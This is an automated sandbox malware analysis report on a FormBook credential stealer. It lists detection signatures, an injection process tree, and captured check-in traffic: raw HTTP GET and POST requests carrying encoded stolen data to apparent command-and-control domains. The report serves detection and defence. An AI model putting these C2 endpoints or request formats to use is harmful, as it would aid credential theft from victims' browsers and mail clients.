Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
new.exe

Overview

General Information

Sample name:new.exe
Analysis ID:1574502
MD5:8b86502f8b81e3335c1f4906c8acb9f7
SHA1:ac9ef49458da3e4075389da3f77ff001f0736852
SHA256:4e1cfeb2023e96da3293df25bc81b3c51f2852eefb0cdfa4a17dc77b65da7c8f
Tags:exeFormbookuser-lowmal3
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • new.exe (PID: 3644 cmdline: "C:\Users\user\Desktop\new.exe" MD5: 8B86502F8B81E3335C1F4906C8ACB9F7)
    • svchost.exe (PID: 7664 cmdline: "C:\Users\user\Desktop\new.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • lxdvPfMVsD.exe (PID: 2540 cmdline: "C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • cttune.exe (PID: 8012 cmdline: "C:\Windows\SysWOW64\cttune.exe" MD5: E515AF722F75E1A5708B532FAA483333)
          • lxdvPfMVsD.exe (PID: 2592 cmdline: "C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 6972 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000D.00000002.2535533484.0000000005400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    0000000A.00000002.2533835730.00000000032E0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000007.00000002.1897811815.0000000007850000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        0000000A.00000002.2533575753.0000000003290000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000009.00000002.2533155385.0000000004350000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            7.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              7.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Uncommon Svchost Parent Process
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\new.exe", CommandLine: "C:\Users\user\Desktop\new.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\new.exe", ParentImage: C:\Users\user\Desktop\new.exe, ParentProcessId: 3644, ParentProcessName: new.exe, ProcessCommandLine: "C:\Users\user\Desktop\new.exe", ProcessId: 7664, ProcessName: svchost.exe
                Sigma detected: Windows Processes Suspicious Parent Directory
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\new.exe", CommandLine: "C:\Users\user\Desktop\new.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\new.exe", ParentImage: C:\Users\user\Desktop\new.exe, ParentProcessId: 3644, ParentProcessName: new.exe, ProcessCommandLine: "C:\Users\user\Desktop\new.exe", ProcessId: 7664, ProcessName: svchost.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-13T11:41:00.998018+010028563181A Network Trojan was detected192.168.2.1049918192.197.113.11280TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Multi AV Scanner detection for submitted file
                Source: new.exeReversingLabs: Detection: 44%
                Yara detected FormBook
                Source: Yara matchFile source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000D.00000002.2535533484.0000000005400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2533835730.00000000032E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1897811815.0000000007850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2533575753.0000000003290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2533155385.0000000004350000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1893344480.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1894505430.0000000004BE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2530076362.0000000002E20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: new.exeJoe Sandbox ML: detected
                Source: new.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: cttune.pdb source: svchost.exe, 00000007.00000003.1862395988.0000000002E2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1862245466.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, lxdvPfMVsD.exe, 00000009.00000002.2532019922.0000000001348000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: cttune.pdbGCTL source: svchost.exe, 00000007.00000003.1862395988.0000000002E2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1862245466.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, lxdvPfMVsD.exe, 00000009.00000002.2532019922.0000000001348000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: lxdvPfMVsD.exe, 00000009.00000000.1792072950.000000000075E000.00000002.00000001.01000000.00000005.sdmp, lxdvPfMVsD.exe, 0000000D.00000002.2530028871.000000000075E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: new.exe, 00000005.00000003.1306017136.00000000035C0000.00000004.00001000.00020000.00000000.sdmp, new.exe, 00000005.00000003.1304500042.0000000003420000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1893866437.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1772921153.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1771135738.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1893866437.0000000003400000.00000040.00001000.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2535071257.000000000501E000.00000040.00001000.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2535071257.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, cttune.exe, 0000000A.00000003.1893364758.0000000004B21000.00000004.00000020.00020000.00000000.sdmp, cttune.exe, 0000000A.00000003.1895894660.0000000004CD9000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: new.exe, 00000005.00000003.1306017136.00000000035C0000.00000004.00001000.00020000.00000000.sdmp, new.exe, 00000005.00000003.1304500042.0000000003420000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000007.00000002.1893866437.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1772921153.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1771135738.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1893866437.0000000003400000.00000040.00001000.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2535071257.000000000501E000.00000040.00001000.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2535071257.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, cttune.exe, 0000000A.00000003.1893364758.0000000004B21000.00000004.00000020.00020000.00000000.sdmp, cttune.exe, 0000000A.00000003.1895894660.0000000004CD9000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: cttune.exe, 0000000A.00000002.2535844419.00000000054AC000.00000004.10000000.00040000.00000000.sdmp, cttune.exe, 0000000A.00000002.2530495496.000000000304B000.00000004.00000020.00020000.00000000.sdmp, lxdvPfMVsD.exe, 0000000D.00000002.2533592399.0000000002FCC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000F.00000002.2186439933.000000002945C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: cttune.exe, 0000000A.00000002.2535844419.00000000054AC000.00000004.10000000.00040000.00000000.sdmp, cttune.exe, 0000000A.00000002.2530495496.000000000304B000.00000004.00000020.00020000.00000000.sdmp, lxdvPfMVsD.exe, 0000000D.00000002.2533592399.0000000002FCC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000F.00000002.2186439933.000000002945C000.00000004.80000000.00040000.00000000.sdmp
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00C2445A GetFileAttributesW,FindFirstFileW,FindClose,5_2_00C2445A
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00C2C6D1 FindFirstFileW,FindClose,5_2_00C2C6D1
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00C2C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,5_2_00C2C75C
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00C2EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_00C2EF95
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00C2F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_00C2F0F2
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00C2F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,5_2_00C2F3F3
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00C237EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,5_2_00C237EF
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00C23B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,5_2_00C23B12
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00C2BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,5_2_00C2BCBC

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2856318 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M4 : 192.168.2.10:49918 -> 192.197.113.112:80
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.tabyscooterrentals.xyz
                Source: DNS query: www.tabyscooterrentals.xyz
                Source: Joe Sandbox ViewIP Address: 194.9.94.86 194.9.94.86
                Source: Joe Sandbox ViewIP Address: 199.59.243.227 199.59.243.227
                Source: Joe Sandbox ViewASN Name: HKKFGL-AS-APHKKwaifongGroupLimitedHK HKKFGL-AS-APHKKwaifongGroupLimitedHK
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00C322EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,5_2_00C322EE
                Source: global trafficHTTP traffic detected: GET /4wxo/?Hn=lLPdJfWx2zHd-riP&6hzlp=AuCk/wTI7zW3ld/vlF6yH/SnOpsg3Nt9prPfFK+Yc5xTqeXBXJi84rnX4QtnNLSqr4pLPSODfOM24Q7oPb8npN1S+mAenC5poxe7lGbUmU2Ideml9w== HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.tabyscooterrentals.xyzUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                Source: global trafficHTTP traffic detected: GET /8cvl/?6hzlp=7z1tMIVVCeOFn4uxK5mz1jwV68wJ7YplGsn8T3mfCMtY7lZDnOfrQMvWs9v0B15OwhJf1ztMzreoSzqDQfzwDL0bb93UG8uYJWkhP+xaRe/kLZVaBg==&Hn=lLPdJfWx2zHd-riP HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.ftaane.netUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                Source: global trafficHTTP traffic detected: GET /2j93/?Hn=lLPdJfWx2zHd-riP&6hzlp=Vzef3oWXaGELtgUQK6WziDhXN2l6Tpk3Ax3n2w42PW1Tdv5T/46T0viVyj66+7X9h8HGTeoaGJDhn+MaRcWt633rnN+WFzamPt7emOGov712MsYpmA== HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.milp.storeUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                Source: global trafficDNS traffic detected: DNS query: www.tabyscooterrentals.xyz
                Source: global trafficDNS traffic detected: DNS query: www.ftaane.net
                Source: global trafficDNS traffic detected: DNS query: www.milp.store
                Source: global trafficDNS traffic detected: DNS query: www.vavada-official.buzz
                Source: unknownHTTP traffic detected: POST /8cvl/ HTTP/1.1Accept: */*Accept-Language: en-USAccept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencodedCache-Control: max-age=0Content-Length: 194Connection: closeHost: www.ftaane.netOrigin: http://www.ftaane.netReferer: http://www.ftaane.net/8cvl/User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)Data Raw: 36 68 7a 6c 70 3d 32 78 64 4e 50 38 78 69 50 75 75 6d 6a 72 54 4f 56 39 75 31 38 31 55 45 32 4f 55 4b 39 2b 5a 6b 50 66 48 38 63 47 47 68 48 2b 45 47 2b 31 52 6a 68 39 57 59 56 73 71 6e 69 4e 33 70 41 58 6b 79 2b 69 46 65 2b 41 45 69 6f 35 69 58 4a 78 4b 54 46 76 72 6b 4c 4a 46 74 4f 4a 6a 36 4c 4d 75 73 46 69 4d 46 50 61 30 4e 50 5a 6a 4e 45 5a 78 52 61 48 2f 62 70 56 32 67 33 74 2b 6e 64 35 78 48 2f 53 71 45 35 35 4c 34 68 68 79 38 56 63 37 4b 4f 54 79 47 30 32 55 68 6e 62 57 77 69 5a 30 4d 72 6a 74 32 79 6d 67 72 2b 4f 33 6c 71 64 6e 50 52 4d 55 52 54 43 4a 74 6f 64 6c 46 Data Ascii: 6hzlp=2xdNP8xiPuumjrTOV9u181UE2OUK9+ZkPfH8cGGhH+EG+1Rjh9WYVsqniN3pAXky+iFe+AEio5iXJxKTFvrkLJFtOJj6LMusFiMFPa0NPZjNEZxRaH/bpV2g3t+nd5xH/SqE55L4hhy8Vc7KOTyG02UhnbWwiZ0Mrjt2ymgr+O3lqdnPRMURTCJtodlF
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Fri, 13 Dec 2024 10:40:39 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-12-13T10:40:44.5161501Z
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Fri, 13 Dec 2024 10:40:58 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingVary: Accept-EncodingX-Powered-By: PHP/7.4.33Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Fri, 13 Dec 2024 10:41:00 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingVary: Accept-EncodingX-Powered-By: PHP/7.4.33Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Fri, 13 Dec 2024 10:41:03 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingVary: Accept-EncodingX-Powered-By: PHP/7.4.33Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Fri, 13 Dec 2024 10:41:06 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingVary: Accept-EncodingX-Powered-By: PHP/7.4.33Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
                Source: cttune.exe, 0000000A.00000002.2537131928.0000000007CD0000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2535844419.0000000005BB8000.00000004.10000000.00040000.00000000.sdmp, lxdvPfMVsD.exe, 0000000D.00000002.2533592399.00000000036D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut
                Source: lxdvPfMVsD.exe, 0000000D.00000002.2535533484.00000000054AB000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.vavada-official.buzz
                Source: lxdvPfMVsD.exe, 0000000D.00000002.2535533484.00000000054AB000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.vavada-official.buzz/emhd/
                Source: cttune.exe, 0000000A.00000003.2080534840.0000000007F7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: cttune.exe, 0000000A.00000003.2080534840.0000000007F7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: cttune.exe, 0000000A.00000003.2080534840.0000000007F7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: cttune.exe, 0000000A.00000003.2080534840.0000000007F7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: cttune.exe, 0000000A.00000003.2080534840.0000000007F7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: cttune.exe, 0000000A.00000003.2080534840.0000000007F7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: cttune.exe, 0000000A.00000003.2080534840.0000000007F7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: cttune.exe, 0000000A.00000002.2530495496.0000000003066000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: cttune.exe, 0000000A.00000002.2530495496.0000000003066000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&l
                Source: cttune.exe, 0000000A.00000002.2530495496.0000000003066000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2
                Source: cttune.exe, 0000000A.00000002.2530495496.0000000003066000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: cttune.exe, 0000000A.00000002.2530495496.0000000003066000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: cttune.exe, 0000000A.00000003.2076008864.0000000007F55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: cttune.exe, 0000000A.00000002.2537131928.0000000007CD0000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2535844419.0000000005BB8000.00000004.10000000.00040000.00000000.sdmp, lxdvPfMVsD.exe, 0000000D.00000002.2533592399.00000000036D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/iOS-114.png
                Source: cttune.exe, 0000000A.00000002.2537131928.0000000007CD0000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2535844419.0000000005BB8000.00000004.10000000.00040000.00000000.sdmp, lxdvPfMVsD.exe, 0000000D.00000002.2533592399.00000000036D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/iOS-57.png
                Source: cttune.exe, 0000000A.00000002.2537131928.0000000007CD0000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2535844419.0000000005BB8000.00000004.10000000.00040000.00000000.sdmp, lxdvPfMVsD.exe, 0000000D.00000002.2533592399.00000000036D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/iOS-72.png
                Source: cttune.exe, 0000000A.00000002.2537131928.0000000007CD0000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2535844419.0000000005BB8000.00000004.10000000.00040000.00000000.sdmp, lxdvPfMVsD.exe, 0000000D.00000002.2533592399.00000000036D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/styles/reset.css
                Source: cttune.exe, 0000000A.00000002.2537131928.0000000007CD0000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2535844419.0000000005BB8000.00000004.10000000.00040000.00000000.sdmp, lxdvPfMVsD.exe, 0000000D.00000002.2533592399.00000000036D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/shared/images/additional-pages-hero-shape.webp
                Source: cttune.exe, 0000000A.00000002.2537131928.0000000007CD0000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2535844419.0000000005BB8000.00000004.10000000.00040000.00000000.sdmp, lxdvPfMVsD.exe, 0000000D.00000002.2533592399.00000000036D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/shared/logo/logo-loopia-white.svg
                Source: cttune.exe, 0000000A.00000002.2537131928.0000000007CD0000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2535844419.0000000005BB8000.00000004.10000000.00040000.00000000.sdmp, lxdvPfMVsD.exe, 0000000D.00000002.2533592399.00000000036D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/shared/style/2022-extra-pages.css
                Source: cttune.exe, 0000000A.00000003.2080534840.0000000007F7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: cttune.exe, 0000000A.00000003.2080534840.0000000007F7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: cttune.exe, 0000000A.00000002.2537131928.0000000007CD0000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2535844419.0000000005BB8000.00000004.10000000.00040000.00000000.sdmp, lxdvPfMVsD.exe, 0000000D.00000002.2533592399.00000000036D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
                Source: cttune.exe, 0000000A.00000002.2537131928.0000000007CD0000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2535844419.0000000005BB8000.00000004.10000000.00040000.00000000.sdmp, lxdvPfMVsD.exe, 0000000D.00000002.2533592399.00000000036D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-NP3MFSK
                Source: cttune.exe, 0000000A.00000002.2537131928.0000000007CD0000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2535844419.0000000005BB8000.00000004.10000000.00040000.00000000.sdmp, lxdvPfMVsD.exe, 0000000D.00000002.2533592399.00000000036D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
                Source: cttune.exe, 0000000A.00000002.2537131928.0000000007CD0000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2535844419.0000000005BB8000.00000004.10000000.00040000.00000000.sdmp, lxdvPfMVsD.exe, 0000000D.00000002.2533592399.00000000036D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin
                Source: cttune.exe, 0000000A.00000002.2537131928.0000000007CD0000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2535844419.0000000005BB8000.00000004.10000000.00040000.00000000.sdmp, lxdvPfMVsD.exe, 0000000D.00000002.2533592399.00000000036D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe
